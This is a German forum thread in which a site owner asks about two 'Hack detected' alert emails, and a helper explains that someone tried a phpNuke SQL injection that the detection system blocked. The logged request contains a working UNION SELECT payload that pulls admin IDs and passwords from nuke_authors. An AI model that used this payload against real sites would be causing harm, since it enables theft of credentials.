Hack detected

Begonnen von smartmusic, 30 Oktober 2004, 11:14:35

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

smartmusic

hallo,
ich habe heute zwei emails bekommen von unserer community mit folgendem inhalt:

1.

--------------------------------------------------
29-10-2004 23:50:44 [Union] Hack detected (0)
user: Anonymous
admin: Anonymous

query:
select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, a.url, s.comments, s.topic, t.topictext from mx_stories s, mx_authors a, mx_topics t where (s.aid=a.aid AND s.topic=t.topicid) AND s.time

2.


--------------------------------------------------
29-10-2004 23:50:43 [Union] Hack detected (0)
user: Anonymous
admin: Anonymous
request:
_GET[name] = Search 
_GET[type] = stories 
_GET[query] = f00bar 
_GET[category] = -1 
_GET[categ] =  and 1=2 UNION SELECT 0,0,aid,pwd,0,0,0,0,0,0 from nuke_authors/*
Serverinfo:
REMOTE_ADDR:          195.175.37.7
QUERY_STRING:         name=Search&type=stories&query=f00bar&category=-1&categ=%20and%201=2%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0%20from%20nuke_authors/*
REQUEST_URI:          /modules.php?name=Search&type=stories&query=f00bar&category=-1&categ=%20and%201=2%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0%20from%20nuke_authors/*
REMOTE_PORT:          44160
REMOTE_HOST:         
HTTP_REFERER:         
HTTP_USER_AGENT:      Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
HTTP_X_FORWARDED_FOR: 195.174.145.150


was hat dies zu bedeuten????


Andi

Moin :)

da hat ein hack-kiddie über eine phpNuke-Sicherheitslücke versucht die Admintabelle auszulesen.
Das Detection System hat das aber abgefangen ;)
schön´s Grüssle, Andi

smartmusic

also nichts wo ich mir nun sorgen machen muss?

Andi

Im Gegenteil, dir wurde eine Sorge erspart ;)
schön´s Grüssle, Andi